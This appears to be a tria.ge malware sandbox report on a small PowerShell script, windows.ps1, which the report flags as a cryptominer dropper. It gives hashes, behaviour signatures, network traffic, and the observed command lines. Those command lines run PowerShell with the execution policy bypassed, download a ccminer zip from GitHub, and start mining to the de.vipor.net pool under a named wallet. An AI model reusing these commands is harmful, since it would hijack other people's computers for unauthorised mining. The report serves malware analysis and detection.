Windows 7 deprecation
Windows 7 will be removed from tria.ge on 2025-03-31
Analysis
-
max time kernel
1744s -
max time network
1798s -
platform
windows10-2004_x64 -
resource
win10v2004-20240709-en -
resource tags
arch:x64arch:x86image:win10v2004-20240709-enlocale:en-usos:windows10-2004-x64system -
submitted
21/07/2024, 09:33 UTC
Static task
static1
Behavioral task
behavioral1
Sample
windows.ps1
Resource
win10-20240404-en
Behavioral task
behavioral2
Sample
windows.ps1
Resource
win10v2004-20240709-en
Behavioral task
behavioral3
Sample
windows.ps1
Resource
win11-20240709-en
General
-
Target
windows.ps1
-
Size
467B
-
MD5
63f6c82077c4c39d6d9101409b16a668
-
SHA1
09d1960993c90f39607f437a2106b65db7aeae29
-
SHA256
18284686feab2a0753bd0059a64004d8b86bb47048065cba12d323efbb6cc891
-
SHA512
3bbf47af04fae3e7fd921bf1319e652c879d6132d4ea495cb7d6f47a38b9a4fb09f7be4af14c2d0c7357febd893c16639268dc82ec3b9194d0d4dc54723e1a34
Malware Config
Signatures
-
Blocklisted process makes network request 1 IoCs
flow pid Process 21 4884 powershell.exe -
Executes dropped EXE 1 IoCs
pid Process 1720 ccminer.exe -
Legitimate hosting services abused for malware hosting/C2 1 TTPs 2 IoCs
flow ioc 20 raw.githubusercontent.com 21 raw.githubusercontent.com -
pid Process 4884 powershell.exe -
Suspicious behavior: EnumeratesProcesses 2 IoCs
pid Process 4884 powershell.exe 4884 powershell.exe -
Suspicious use of AdjustPrivilegeToken 22 IoCs
description pid Process Token: SeDebugPrivilege 4884 powershell.exe Token: SeIncreaseQuotaPrivilege 4884 powershell.exe Token: SeSecurityPrivilege 4884 powershell.exe Token: SeTakeOwnershipPrivilege 4884 powershell.exe Token: SeLoadDriverPrivilege 4884 powershell.exe Token: SeSystemProfilePrivilege 4884 powershell.exe Token: SeSystemtimePrivilege 4884 powershell.exe Token: SeProfSingleProcessPrivilege 4884 powershell.exe Token: SeIncBasePriorityPrivilege 4884 powershell.exe Token: SeCreatePagefilePrivilege 4884 powershell.exe Token: SeBackupPrivilege 4884 powershell.exe Token: SeRestorePrivilege 4884 powershell.exe Token: SeShutdownPrivilege 4884 powershell.exe Token: SeDebugPrivilege 4884 powershell.exe Token: SeSystemEnvironmentPrivilege 4884 powershell.exe Token: SeRemoteShutdownPrivilege 4884 powershell.exe Token: SeUndockPrivilege 4884 powershell.exe Token: SeManageVolumePrivilege 4884 powershell.exe Token: 33 4884 powershell.exe Token: 34 4884 powershell.exe Token: 35 4884 powershell.exe Token: 36 4884 powershell.exe -
Suspicious use of WriteProcessMemory 4 IoCs
description pid Process procid_target PID 4884 wrote to memory of 1720 4884 powershell.exe 92 PID 4884 wrote to memory of 1720 4884 powershell.exe 92 PID 1720 wrote to memory of 3940 1720 ccminer.exe 93 PID 1720 wrote to memory of 3940 1720 ccminer.exe 93
Processes
-
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exepowershell.exe -ExecutionPolicy bypass -File C:\Users\Admin\AppData\Local\Temp\windows.ps11⤵
- Blocklisted process makes network request
- Command and Scripting Interpreter: PowerShell
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
- Suspicious use of WriteProcessMemory
PID:4884 -
C:\Users\Admin\AppData\Local\Temp\ccminer\ccminer\ccminer.exe"C:\Users\Admin\AppData\Local\Temp\ccminer\ccminer\ccminer.exe" -a verus -o stratum+tcp://de.vipor.net:5040 -u RHACKERwSVgjTvV4vNiTjmrkLTD7a92ALD.Windows -p x -t 22⤵
- Executes dropped EXE
- Suspicious use of WriteProcessMemory
PID:1720 -
C:\Windows\system32\cmd.exeC:\Windows\system32\cmd.exe /c cls3⤵PID:3940
-
-
Network
-
Remote address:8.8.8.8:53Requestg.bing.comIN AResponseg.bing.comIN CNAMEg-bing-com.dual-a-0034.a-msedge.netg-bing-com.dual-a-0034.a-msedge.netIN CNAMEdual-a-0034.a-msedge.netdual-a-0034.a-msedge.netIN A13.107.21.237dual-a-0034.a-msedge.netIN A204.79.197.237
-
GEThttps://g.bing.com/neg/0?action=emptycreativeimpression&adUnitId=11730597&publisherId=251978541&rid=7b432bc62f6c418487e45ff331f61049&localId=w:7644E81C-AD49-10CC-B943-5E44723BEB42&deviceId=6896204247012457&anid=Remote address:13.107.21.237:443RequestGET /neg/0?action=emptycreativeimpression&adUnitId=11730597&publisherId=251978541&rid=7b432bc62f6c418487e45ff331f61049&localId=w:7644E81C-AD49-10CC-B943-5E44723BEB42&deviceId=6896204247012457&anid= HTTP/2.0
host: g.bing.com
accept-encoding: gzip, deflate
user-agent: WindowsShellClient/9.0.40929.0 (Windows)
ResponseHTTP/2.0 204
pragma: no-cache
expires: Fri, 01 Jan 1990 00:00:00 GMT
set-cookie: MUID=137444ECC9766C050345502FC8966D64; domain=.bing.com; expires=Fri, 15-Aug-2025 16:34:38 GMT; path=/; SameSite=None; Secure; Priority=High;
strict-transport-security: max-age=31536000; includeSubDomains; preload
access-control-allow-origin: *
x-cache: CONFIG_NOCACHE
accept-ch: Sec-CH-UA-Arch, Sec-CH-UA-Bitness, Sec-CH-UA-Full-Version, Sec-CH-UA-Full-Version-List, Sec-CH-UA-Mobile, Sec-CH-UA-Model, Sec-CH-UA-Platform, Sec-CH-UA-Platform-Version
x-msedge-ref: Ref A: D88FDBB84E184A4FAE500E883A935A8B Ref B: LON04EDGE1115 Ref C: 2024-07-21T16:34:38Z
date: Sun, 21 Jul 2024 16:34:38 GMT
-
GEThttps://g.bing.com/neg/0?action=emptycreative&adUnitId=11730597&publisherId=251978541&rid=7b432bc62f6c418487e45ff331f61049&localId=w:7644E81C-AD49-10CC-B943-5E44723BEB42&deviceId=6896204247012457&anid=Remote address:13.107.21.237:443RequestGET /neg/0?action=emptycreative&adUnitId=11730597&publisherId=251978541&rid=7b432bc62f6c418487e45ff331f61049&localId=w:7644E81C-AD49-10CC-B943-5E44723BEB42&deviceId=6896204247012457&anid= HTTP/2.0
host: g.bing.com
accept-encoding: gzip, deflate
user-agent: WindowsShellClient/9.0.40929.0 (Windows)
cookie: MUID=137444ECC9766C050345502FC8966D64
ResponseHTTP/2.0 204
pragma: no-cache
expires: Fri, 01 Jan 1990 00:00:00 GMT
set-cookie: MSPTC=eXxgYmRnc5jzz5-jZxr6cca5Fc7ebRocqaOhWewdWk8; domain=.bing.com; expires=Fri, 15-Aug-2025 16:34:38 GMT; path=/; Partitioned; secure; SameSite=None
strict-transport-security: max-age=31536000; includeSubDomains; preload
access-control-allow-origin: *
x-cache: CONFIG_NOCACHE
accept-ch: Sec-CH-UA-Arch, Sec-CH-UA-Bitness, Sec-CH-UA-Full-Version, Sec-CH-UA-Full-Version-List, Sec-CH-UA-Mobile, Sec-CH-UA-Model, Sec-CH-UA-Platform, Sec-CH-UA-Platform-Version
x-msedge-ref: Ref A: F819D5F49C144358ADB7B042CEFE732B Ref B: LON04EDGE1115 Ref C: 2024-07-21T16:34:38Z
date: Sun, 21 Jul 2024 16:34:38 GMT
-
GEThttps://g.bing.com/neg/0?action=emptycreativeimpression&adUnitId=11730597&publisherId=251978541&rid=7b432bc62f6c418487e45ff331f61049&localId=w:7644E81C-AD49-10CC-B943-5E44723BEB42&deviceId=6896204247012457&anid=Remote address:13.107.21.237:443RequestGET /neg/0?action=emptycreativeimpression&adUnitId=11730597&publisherId=251978541&rid=7b432bc62f6c418487e45ff331f61049&localId=w:7644E81C-AD49-10CC-B943-5E44723BEB42&deviceId=6896204247012457&anid= HTTP/2.0
host: g.bing.com
accept-encoding: gzip, deflate
user-agent: WindowsShellClient/9.0.40929.0 (Windows)
cookie: MUID=137444ECC9766C050345502FC8966D64; MSPTC=eXxgYmRnc5jzz5-jZxr6cca5Fc7ebRocqaOhWewdWk8
ResponseHTTP/2.0 204
pragma: no-cache
expires: Fri, 01 Jan 1990 00:00:00 GMT
strict-transport-security: max-age=31536000; includeSubDomains; preload
access-control-allow-origin: *
x-cache: CONFIG_NOCACHE
accept-ch: Sec-CH-UA-Arch, Sec-CH-UA-Bitness, Sec-CH-UA-Full-Version, Sec-CH-UA-Full-Version-List, Sec-CH-UA-Mobile, Sec-CH-UA-Model, Sec-CH-UA-Platform, Sec-CH-UA-Platform-Version
x-msedge-ref: Ref A: DA372826A6164EEDB881288D2EEF66BD Ref B: LON04EDGE1115 Ref C: 2024-07-21T16:34:38Z
date: Sun, 21 Jul 2024 16:34:38 GMT
-
Remote address:8.8.8.8:53Request183.142.211.20.in-addr.arpaIN PTRResponse
-
Remote address:8.8.8.8:53Request240.221.184.93.in-addr.arpaIN PTRResponse
-
Remote address:8.8.8.8:53Request20.160.190.20.in-addr.arpaIN PTRResponse
-
Remote address:8.8.8.8:53Requestraw.githubusercontent.comIN AResponseraw.githubusercontent.comIN A185.199.111.133raw.githubusercontent.comIN A185.199.110.133raw.githubusercontent.comIN A185.199.109.133raw.githubusercontent.comIN A185.199.108.133
-
GEThttps://raw.githubusercontent.com/MomboteQ/mining-scripts/main/verus/ccminer-win.zippowershell.exeRemote address:185.199.111.133:443RequestGET /MomboteQ/mining-scripts/main/verus/ccminer-win.zip HTTP/1.1
User-Agent: Mozilla/5.0 (Windows NT; Windows NT 10.0; en-US) WindowsPowerShell/5.1.19041.1237
Host: raw.githubusercontent.com
Connection: Keep-Alive
ResponseHTTP/1.1 200 OK
Content-Length: 1412223
Cache-Control: max-age=300
Content-Security-Policy: default-src 'none'; style-src 'unsafe-inline'; sandbox
Content-Type: application/zip
ETag: "19ccc6d11b3c33e877316ccc6d2b2e4b2ed7138fc831e088812c7f6a799d516d"
Strict-Transport-Security: max-age=31536000
X-Content-Type-Options: nosniff
X-Frame-Options: deny
X-XSS-Protection: 1; mode=block
X-GitHub-Request-Id: 3DA2:13AA55:15BD17:1C187B:669D103D
Accept-Ranges: bytes
Date: Sun, 21 Jul 2024 16:34:39 GMT
Via: 1.1 varnish
X-Served-By: cache-lcy-eglc8600071-LCY
X-Cache: HIT
X-Cache-Hits: 1
X-Timer: S1721579679.413721,VS0,VE3
Vary: Authorization,Accept-Encoding,Origin
Access-Control-Allow-Origin: *
Cross-Origin-Resource-Policy: cross-origin
X-Fastly-Request-ID: 907ea015f99ea47de1efee8b4d6ae9107e67eb99
Expires: Sun, 21 Jul 2024 16:39:39 GMT
Source-Age: 99
-
Remote address:8.8.8.8:53Request88.156.103.20.in-addr.arpaIN PTRResponse
-
Remote address:8.8.8.8:53Request237.21.107.13.in-addr.arpaIN PTRResponse
-
Remote address:8.8.8.8:53Request133.111.199.185.in-addr.arpaIN PTRResponse133.111.199.185.in-addr.arpaIN PTRcdn-185-199-111-133githubcom
-
Remote address:8.8.8.8:53Requestde.vipor.netIN AResponsede.vipor.netIN CNAMEde.vipordns.netde.vipordns.netIN A51.195.34.205
-
Remote address:8.8.8.8:53Request205.34.195.51.in-addr.arpaIN PTRResponse205.34.195.51.in-addr.arpaIN PTRip205ip-51-195-34eu
-
Remote address:8.8.8.8:53Request209.205.72.20.in-addr.arpaIN PTRResponse
-
Remote address:8.8.8.8:53Request183.59.114.20.in-addr.arpaIN PTRResponse
-
Remote address:8.8.8.8:53Request154.239.44.20.in-addr.arpaIN PTRResponse
-
Remote address:8.8.8.8:53Request171.39.242.20.in-addr.arpaIN PTRResponse
-
Remote address:8.8.8.8:53Request172.214.232.199.in-addr.arpaIN PTRResponse
-
Remote address:8.8.8.8:53Request22.236.111.52.in-addr.arpaIN PTRResponse
-
Remote address:8.8.8.8:53Request43.58.199.20.in-addr.arpaIN PTRResponse
-
Remote address:8.8.8.8:53Requesttse1.mm.bing.netIN AResponsetse1.mm.bing.netIN CNAMEmm-mm.bing.net.trafficmanager.netmm-mm.bing.net.trafficmanager.netIN CNAMEax-0001.ax-msedge.netax-0001.ax-msedge.netIN A150.171.28.10ax-0001.ax-msedge.netIN A150.171.27.10
-
GEThttps://tse1.mm.bing.net/th?id=OADD2.10239339388130_1LUEK7XGBN2FMZI35&pid=21.2&c=3&w=1080&h=1920&dynsize=1&qlt=90Remote address:150.171.28.10:443RequestGET /th?id=OADD2.10239339388130_1LUEK7XGBN2FMZI35&pid=21.2&c=3&w=1080&h=1920&dynsize=1&qlt=90 HTTP/2.0
host: tse1.mm.bing.net
accept: */*
accept-encoding: gzip, deflate, br
user-agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/70.0.3538.102 Safari/537.36 Edge/18.19041
ResponseHTTP/2.0 200
content-length: 838075
content-type: image/jpeg
x-cache: TCP_HIT
access-control-allow-origin: *
access-control-allow-headers: *
access-control-allow-methods: GET, POST, OPTIONS
timing-allow-origin: *
report-to: {"group":"network-errors","max_age":604800,"endpoints":[{"url":"https://aefd.nelreports.net/api/report?cat=bingth&ndcParam=QUZE"}]}
nel: {"report_to":"network-errors","max_age":604800,"success_fraction":0.001,"failure_fraction":1.0}
accept-ch: Sec-CH-UA-Arch, Sec-CH-UA-Bitness, Sec-CH-UA-Full-Version, Sec-CH-UA-Full-Version-List, Sec-CH-UA-Mobile, Sec-CH-UA-Model, Sec-CH-UA-Platform, Sec-CH-UA-Platform-Version
x-msedge-ref: Ref A: 6A1CB921DEB74D61A3AF5DAA5DCC459F Ref B: LON04EDGE0809 Ref C: 2024-07-21T16:39:19Z
date: Sun, 21 Jul 2024 16:39:19 GMT
-
GEThttps://tse1.mm.bing.net/th?id=OADD2.10239317301205_1OM9XZCKYFXI34HLQ&pid=21.2&c=16&roil=0&roit=0&roir=1&roib=1&w=1920&h=1080&dynsize=1&qlt=90Remote address:150.171.28.10:443RequestGET /th?id=OADD2.10239317301205_1OM9XZCKYFXI34HLQ&pid=21.2&c=16&roil=0&roit=0&roir=1&roib=1&w=1920&h=1080&dynsize=1&qlt=90 HTTP/2.0
host: tse1.mm.bing.net
accept: */*
accept-encoding: gzip, deflate, br
user-agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/70.0.3538.102 Safari/537.36 Edge/18.19041
ResponseHTTP/2.0 200
content-length: 940465
content-type: image/jpeg
x-cache: TCP_HIT
access-control-allow-origin: *
access-control-allow-headers: *
access-control-allow-methods: GET, POST, OPTIONS
timing-allow-origin: *
report-to: {"group":"network-errors","max_age":604800,"endpoints":[{"url":"https://aefd.nelreports.net/api/report?cat=bingth&ndcParam=QUZE"}]}
nel: {"report_to":"network-errors","max_age":604800,"success_fraction":0.001,"failure_fraction":1.0}
accept-ch: Sec-CH-UA-Arch, Sec-CH-UA-Bitness, Sec-CH-UA-Full-Version, Sec-CH-UA-Full-Version-List, Sec-CH-UA-Mobile, Sec-CH-UA-Model, Sec-CH-UA-Platform, Sec-CH-UA-Platform-Version
x-msedge-ref: Ref A: 03EA86178B504F38B86AD6B168E8CAB5 Ref B: LON04EDGE0809 Ref C: 2024-07-21T16:39:19Z
date: Sun, 21 Jul 2024 16:39:19 GMT
-
GEThttps://tse1.mm.bing.net/th?id=OADD2.10239317300970_1WZNZYNWWAF6IP05J&pid=21.2&c=16&roil=0&roit=0&roir=1&roib=1&w=1920&h=1080&dynsize=1&qlt=90Remote address:150.171.28.10:443RequestGET /th?id=OADD2.10239317300970_1WZNZYNWWAF6IP05J&pid=21.2&c=16&roil=0&roit=0&roir=1&roib=1&w=1920&h=1080&dynsize=1&qlt=90 HTTP/2.0
host: tse1.mm.bing.net
accept: */*
accept-encoding: gzip, deflate, br
user-agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/70.0.3538.102 Safari/537.36 Edge/18.19041
ResponseHTTP/2.0 200
content-length: 646893
content-type: image/jpeg
x-cache: TCP_HIT
access-control-allow-origin: *
access-control-allow-headers: *
access-control-allow-methods: GET, POST, OPTIONS
timing-allow-origin: *
report-to: {"group":"network-errors","max_age":604800,"endpoints":[{"url":"https://aefd.nelreports.net/api/report?cat=bingth&ndcParam=QUZE"}]}
nel: {"report_to":"network-errors","max_age":604800,"success_fraction":0.001,"failure_fraction":1.0}
accept-ch: Sec-CH-UA-Arch, Sec-CH-UA-Bitness, Sec-CH-UA-Full-Version, Sec-CH-UA-Full-Version-List, Sec-CH-UA-Mobile, Sec-CH-UA-Model, Sec-CH-UA-Platform, Sec-CH-UA-Platform-Version
x-msedge-ref: Ref A: 10DEF1F731284E40B83D73DF3F9FB0B1 Ref B: LON04EDGE0809 Ref C: 2024-07-21T16:39:19Z
date: Sun, 21 Jul 2024 16:39:19 GMT
-
GEThttps://tse1.mm.bing.net/th?id=OADD2.10239339388129_199HS4001G3EH5S78&pid=21.2&c=16&roil=0&roit=0&roir=1&roib=1&w=1920&h=1080&dynsize=1&qlt=90Remote address:150.171.28.10:443RequestGET /th?id=OADD2.10239339388129_199HS4001G3EH5S78&pid=21.2&c=16&roil=0&roit=0&roir=1&roib=1&w=1920&h=1080&dynsize=1&qlt=90 HTTP/2.0
host: tse1.mm.bing.net
accept: */*
accept-encoding: gzip, deflate, br
user-agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/70.0.3538.102 Safari/537.36 Edge/18.19041
ResponseHTTP/2.0 200
content-length: 569199
content-type: image/jpeg
x-cache: TCP_HIT
access-control-allow-origin: *
access-control-allow-headers: *
access-control-allow-methods: GET, POST, OPTIONS
timing-allow-origin: *
report-to: {"group":"network-errors","max_age":604800,"endpoints":[{"url":"https://aefd.nelreports.net/api/report?cat=bingth&ndcParam=QUZE"}]}
nel: {"report_to":"network-errors","max_age":604800,"success_fraction":0.001,"failure_fraction":1.0}
accept-ch: Sec-CH-UA-Arch, Sec-CH-UA-Bitness, Sec-CH-UA-Full-Version, Sec-CH-UA-Full-Version-List, Sec-CH-UA-Mobile, Sec-CH-UA-Model, Sec-CH-UA-Platform, Sec-CH-UA-Platform-Version
x-msedge-ref: Ref A: 131A92B973BE439482887CBCEAB031EA Ref B: LON04EDGE0809 Ref C: 2024-07-21T16:39:19Z
date: Sun, 21 Jul 2024 16:39:19 GMT
-
GEThttps://tse1.mm.bing.net/th?id=OADD2.10239317301403_18A51FWD0ORQI7TWA&pid=21.2&c=3&w=1080&h=1920&dynsize=1&qlt=90Remote address:150.171.28.10:443RequestGET /th?id=OADD2.10239317301403_18A51FWD0ORQI7TWA&pid=21.2&c=3&w=1080&h=1920&dynsize=1&qlt=90 HTTP/2.0
host: tse1.mm.bing.net
accept: */*
accept-encoding: gzip, deflate, br
user-agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/70.0.3538.102 Safari/537.36 Edge/18.19041
ResponseHTTP/2.0 200
content-length: 771044
content-type: image/jpeg
x-cache: TCP_HIT
access-control-allow-origin: *
access-control-allow-headers: *
access-control-allow-methods: GET, POST, OPTIONS
timing-allow-origin: *
report-to: {"group":"network-errors","max_age":604800,"endpoints":[{"url":"https://aefd.nelreports.net/api/report?cat=bingth&ndcParam=QUZE"}]}
nel: {"report_to":"network-errors","max_age":604800,"success_fraction":0.001,"failure_fraction":1.0}
accept-ch: Sec-CH-UA-Arch, Sec-CH-UA-Bitness, Sec-CH-UA-Full-Version, Sec-CH-UA-Full-Version-List, Sec-CH-UA-Mobile, Sec-CH-UA-Model, Sec-CH-UA-Platform, Sec-CH-UA-Platform-Version
x-msedge-ref: Ref A: 5A45366F78A84577AC5FF8FCEA7F53DF Ref B: LON04EDGE0809 Ref C: 2024-07-21T16:39:19Z
date: Sun, 21 Jul 2024 16:39:19 GMT
-
GEThttps://tse1.mm.bing.net/th?id=OADD2.10239317301614_1PEIP2AXZTPQ08R0S&pid=21.2&c=3&w=1080&h=1920&dynsize=1&qlt=90Remote address:150.171.28.10:443RequestGET /th?id=OADD2.10239317301614_1PEIP2AXZTPQ08R0S&pid=21.2&c=3&w=1080&h=1920&dynsize=1&qlt=90 HTTP/2.0
host: tse1.mm.bing.net
accept: */*
accept-encoding: gzip, deflate, br
user-agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/70.0.3538.102 Safari/537.36 Edge/18.19041
ResponseHTTP/2.0 200
content-length: 563726
content-type: image/jpeg
x-cache: TCP_HIT
access-control-allow-origin: *
access-control-allow-headers: *
access-control-allow-methods: GET, POST, OPTIONS
timing-allow-origin: *
report-to: {"group":"network-errors","max_age":604800,"endpoints":[{"url":"https://aefd.nelreports.net/api/report?cat=bingth&ndcParam=QUZE"}]}
nel: {"report_to":"network-errors","max_age":604800,"success_fraction":0.001,"failure_fraction":1.0}
accept-ch: Sec-CH-UA-Arch, Sec-CH-UA-Bitness, Sec-CH-UA-Full-Version, Sec-CH-UA-Full-Version-List, Sec-CH-UA-Mobile, Sec-CH-UA-Model, Sec-CH-UA-Platform, Sec-CH-UA-Platform-Version
x-msedge-ref: Ref A: 9C7D5ADC70924AC9894A8C83993B243B Ref B: LON04EDGE0809 Ref C: 2024-07-21T16:39:49Z
date: Sun, 21 Jul 2024 16:39:49 GMT
-
Remote address:8.8.8.8:53Request85.65.42.20.in-addr.arpaIN PTRResponse
-
13.107.21.237:443https://g.bing.com/neg/0?action=emptycreativeimpression&adUnitId=11730597&publisherId=251978541&rid=7b432bc62f6c418487e45ff331f61049&localId=w:7644E81C-AD49-10CC-B943-5E44723BEB42&deviceId=6896204247012457&anid=tls, http22.0kB 9.3kB 21 19
HTTP Request
GET https://g.bing.com/neg/0?action=emptycreativeimpression&adUnitId=11730597&publisherId=251978541&rid=7b432bc62f6c418487e45ff331f61049&localId=w:7644E81C-AD49-10CC-B943-5E44723BEB42&deviceId=6896204247012457&anid=HTTP Response
204HTTP Request
GET https://g.bing.com/neg/0?action=emptycreative&adUnitId=11730597&publisherId=251978541&rid=7b432bc62f6c418487e45ff331f61049&localId=w:7644E81C-AD49-10CC-B943-5E44723BEB42&deviceId=6896204247012457&anid=HTTP Response
204HTTP Request
GET https://g.bing.com/neg/0?action=emptycreativeimpression&adUnitId=11730597&publisherId=251978541&rid=7b432bc62f6c418487e45ff331f61049&localId=w:7644E81C-AD49-10CC-B943-5E44723BEB42&deviceId=6896204247012457&anid=HTTP Response
204 -
185.199.111.133:443https://raw.githubusercontent.com/MomboteQ/mining-scripts/main/verus/ccminer-win.ziptls, httppowershell.exe37.0kB 1.5MB 674 1064
HTTP Request
GET https://raw.githubusercontent.com/MomboteQ/mining-scripts/main/verus/ccminer-win.zipHTTP Response
200 -
365.1kB 63.3kB 556 330
-
1.2kB 6.9kB 15 13
-
1.2kB 6.9kB 15 13
-
150.171.28.10:443https://tse1.mm.bing.net/th?id=OADD2.10239317301614_1PEIP2AXZTPQ08R0S&pid=21.2&c=3&w=1080&h=1920&dynsize=1&qlt=90tls, http2169.6kB 4.5MB 3262 3254
HTTP Request
GET https://tse1.mm.bing.net/th?id=OADD2.10239339388130_1LUEK7XGBN2FMZI35&pid=21.2&c=3&w=1080&h=1920&dynsize=1&qlt=90HTTP Request
GET https://tse1.mm.bing.net/th?id=OADD2.10239317301205_1OM9XZCKYFXI34HLQ&pid=21.2&c=16&roil=0&roit=0&roir=1&roib=1&w=1920&h=1080&dynsize=1&qlt=90HTTP Request
GET https://tse1.mm.bing.net/th?id=OADD2.10239317300970_1WZNZYNWWAF6IP05J&pid=21.2&c=16&roil=0&roit=0&roir=1&roib=1&w=1920&h=1080&dynsize=1&qlt=90HTTP Request
GET https://tse1.mm.bing.net/th?id=OADD2.10239339388129_199HS4001G3EH5S78&pid=21.2&c=16&roil=0&roit=0&roir=1&roib=1&w=1920&h=1080&dynsize=1&qlt=90HTTP Request
GET https://tse1.mm.bing.net/th?id=OADD2.10239317301403_18A51FWD0ORQI7TWA&pid=21.2&c=3&w=1080&h=1920&dynsize=1&qlt=90HTTP Response
200HTTP Response
200HTTP Response
200HTTP Response
200HTTP Response
200HTTP Request
GET https://tse1.mm.bing.net/th?id=OADD2.10239317301614_1PEIP2AXZTPQ08R0S&pid=21.2&c=3&w=1080&h=1920&dynsize=1&qlt=90HTTP Response
200 -
1.2kB 8.3kB 16 14
-
1.4kB 6.9kB 16 13
-
56 B 151 B 1 1
DNS Request
g.bing.com
DNS Response
13.107.21.237204.79.197.237
-
73 B 159 B 1 1
DNS Request
183.142.211.20.in-addr.arpa
-
73 B 144 B 1 1
DNS Request
240.221.184.93.in-addr.arpa
-
72 B 158 B 1 1
DNS Request
20.160.190.20.in-addr.arpa
-
71 B 135 B 1 1
DNS Request
raw.githubusercontent.com
DNS Response
185.199.111.133185.199.110.133185.199.109.133185.199.108.133
-
72 B 158 B 1 1
DNS Request
88.156.103.20.in-addr.arpa
-
72 B 158 B 1 1
DNS Request
237.21.107.13.in-addr.arpa
-
74 B 118 B 1 1
DNS Request
133.111.199.185.in-addr.arpa
-
58 B 100 B 1 1
DNS Request
de.vipor.net
DNS Response
51.195.34.205
-
72 B 107 B 1 1
DNS Request
205.34.195.51.in-addr.arpa
-
72 B 158 B 1 1
DNS Request
209.205.72.20.in-addr.arpa
-
72 B 158 B 1 1
DNS Request
183.59.114.20.in-addr.arpa
-
72 B 158 B 1 1
DNS Request
154.239.44.20.in-addr.arpa
-
72 B 158 B 1 1
DNS Request
171.39.242.20.in-addr.arpa
-
74 B 128 B 1 1
DNS Request
172.214.232.199.in-addr.arpa
-
72 B 158 B 1 1
DNS Request
22.236.111.52.in-addr.arpa
-
71 B 157 B 1 1
DNS Request
43.58.199.20.in-addr.arpa
-
62 B 170 B 1 1
DNS Request
tse1.mm.bing.net
DNS Response
150.171.28.10150.171.27.10
-
70 B 156 B 1 1
DNS Request
85.65.42.20.in-addr.arpa
MITRE ATT&CK Enterprise v15
Replay Monitor
Loading Replay Monitor...
Downloads
-
Filesize
60B
MD5d17fe0a3f47be24a6453e9ef58c94641
SHA16ab83620379fc69f80c0242105ddffd7d98d5d9d
SHA25696ad1146eb96877eab5942ae0736b82d8b5e2039a80d3d6932665c1a4c87dcf7
SHA5125b592e58f26c264604f98f6aa12860758ce606d1c63220736cf0c779e4e18e3cec8706930a16c38b20161754d1017d1657d35258e58ca22b18f5b232880dec82
-
Filesize
652KB
MD5153e4364a395b282b983dfc2c5884105
SHA19147a6afa63bd7d7e451c693e362730c692781e1
SHA2566a1077166de9d1cc6fceaf6da6f8c5e1c8d9d5f99f3ab845b9790fc6d395d896
SHA512378fe8b9ae243d5844243999a909ab45216920d63149b39be521e5212533f0dc30e8620c6285738e1100618f44d1576b3ccd9aa27b0e65b29a3ca1937047173d